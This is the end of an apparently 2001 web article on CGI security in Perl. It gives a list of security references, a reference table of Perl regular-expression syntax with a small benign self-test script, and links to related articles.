Programming Perl, By Larry Wall, Tom Christiansen & Randal L. Schwartz, O'Reilly & Associates, 1996. Chapter 6: Social Engineering.
Perl Cookbook, By Tom Christiansen & Nathan Torkington, O'Reilly & Associates, 1998. Chapter 19: CGI Programming.
perlsec - Perl documentation on Perl security.
Web Security and Commerce, By Simson Garfinkel & Gene Spafford, O'Reilly & Associates, 1996. Chapter 6: Secure CGI/API Programming.
Pre-Built CGI Scripts - Security Issues When Installing and Customizing Pre-Built Web Scripts, Selena Sol, WDVL.com.
CGI Wrappers - CGIWrap, sbox.
The CGI Security FAQ, Maintained by Paul Phillips. This document contains useful guidelines, but has not been updated since September 1995.
CGI (Server) Scripts and Safe Scripting in Perl in The World Wide Web Security FAQ, Maintained by Lincoln Stein.
CGI/Perl Taint Mode FAQ, Maintained by Gunther Birznieks.

Appendix : A Summary of Perl Regular Expressions

EXPRESSION	FUNCTION
`/abc/`	Matches abc anywhere within the string
`/^abc/`	Matches abc at the beginning of the string
`/abc$/`	Matches abc at the end of the string
`/a|b/`	Matches either a or b
`/ab{m,n}c/`	Matches an a followed by between m and n b's (inclusive), followed by c, where m and n are nonnegative integers with m ≤ n. If the second number is omitted, as in /ab{m,}c/, the expression will match m or more b's.
`/ab*c/`	Matches an a followed by zero or more b's, followed by c.
`/ab+c/`	Matches an a followed by one or more b's followed by c.
`/ab?c/`	Matches an a followed by an optional b followed by c. In Perl 5, the expression /ab*?c/ matches an a followed by as few b's as possible, followed by c.
`/./`	Matches any single character except a newline (\n). /a..d/ matches an a followed by any two characters, followed by d.
`/[abc]/`	Matches any one of a or b or c. A pattern of /[abc]+/ matches strings such as abcab, acbc, abbac, and so on.
`/\d/`	Matches a digit. Multipliers can be used. (/\d+/ matches one or more digits.)
`/\w/`	Matches a word character (a letter, a digit, or an underscore).
`/\s/`	Matches a character classified as whitespace.
`/\b/`	Matches a word boundary. /cde\b/ matches cde, but not cdef. Inside a character class, that is, [\b], \b matches a backspace character instead.
`/[^abc]/`	Matches a character that is not in the class. /[^abc]+/ will match a string such as defg.
`/\D/`	Matches a character that is not a digit.
`/\W/`	Matches a character that is not a word character.
`/\S/`	Matches a character that is not whitespace.
`/\B/`	Requires that there is no word boundary. /perl\B/ matches the perl in perlscript, but not the perl in perl script.
`/\*/`	Matches the * character. Use the \ character to escape characters that have significance in a regular expression.
`/(abc)/`	Matches abc anywhere within the string, but the parentheses act as memory, storing abc in the variable $1.
`/abc/i`	Ignores case. Matches abc, Abc, ABc, and so on.
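A few rows of the table can be checked directly in Perl. The following sketch is only a self-test of the kind one might write while learning the notation; the array `@cases` and the helper `count_mismatches` are hypothetical names, and the sample strings are chosen for illustration.

```perl
use strict;
use warnings;

# Each case: [ pattern, sample string, whether a match is expected ]
my @cases = (
    [ qr/^abc/,      'xabc',        0 ],    # abc is not at the beginning
    [ qr/abc$/,      'xabc',        1 ],    # abc is at the end
    [ qr/ab{2,3}c/,  'abbc',        1 ],    # two b's are within 2..3
    [ qr/ab{2,3}c/,  'abc',         0 ],    # one b is too few
    [ qr/cde\b/,     'cdef',        0 ],    # no word boundary after cde
    [ qr/perl\B/,    'perlscript',  1 ],    # no boundary after perl
    [ qr/perl\B/,    'perl script', 0 ],    # boundary before the space
    [ qr/abc/i,      'ABc',         1 ],    # case is ignored
);

# Count the cases whose actual result differs from the expected one.
sub count_mismatches {
    my $bad = 0;
    for my $case (@cases) {
        my ($pattern, $string, $expected) = @$case;
        my $matched = $string =~ $pattern ? 1 : 0;
        $bad++ if $matched != $expected;
    }
    return $bad;
}

print "mismatches: ", count_mismatches(), "\n";

# Parentheses store the matched text in $1.
if ('port 8080' =~ /(\d+)/) {
    print "captured: $1\n";
}
```

The same patterns, anchored with ^ and $ (or \A and \z), are the building blocks for filtering user input before it reaches the shell.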

Related items

Creating a Page Counter In Perl

Speed Thrills : CGI Please ... and Fast!

CGI Programming Made (Relatively) Easy Using Libraries

Server-Side Includes and its Extensions

Random and Recursive Crypting using Salt on Unix and Win32

Timestamping an HTML Document

Deleting Files in Perl

Creating a mailing list using Perl

Reading and Writing to Files on the Server

Server Side Includes and CGI Security

Feedback on 'CGI Security : Better Safe than Sorry'

Thursday June 28th, 2001 at 10:14:03 - Neil Fraser